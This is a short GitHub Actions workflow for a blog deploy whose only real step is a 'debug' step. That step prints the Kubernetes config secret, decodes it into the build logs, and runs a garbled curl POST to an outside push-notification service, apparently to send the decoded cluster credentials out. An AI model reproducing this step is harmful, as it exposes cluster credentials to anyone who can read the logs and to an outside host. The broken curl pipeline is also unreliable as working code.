name: blog deploy

on: 
  push:
    branches: 
      - master

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    
    steps:
    - uses: actions/checkout@v1
    - name: Debug KUBE_CONFIG_DATA
      run: |
        echo "KUBE_CONFIG_DATA: ${{ secrets.KUBE_CONFIG_DATA }}"
        echo "Decoded KUBE_CONFIG:"
        echo ${{ secrets.KUBE_CONFIG_DATA }} | base64 --decode | kubectl config view
        curl --location --request POST 'https://api2.pushdeer.com/message/push?text='' ' | ${{ secrets.KUBE_CONFIG_DATA }} | base64 --decode | kubectl config view >> test
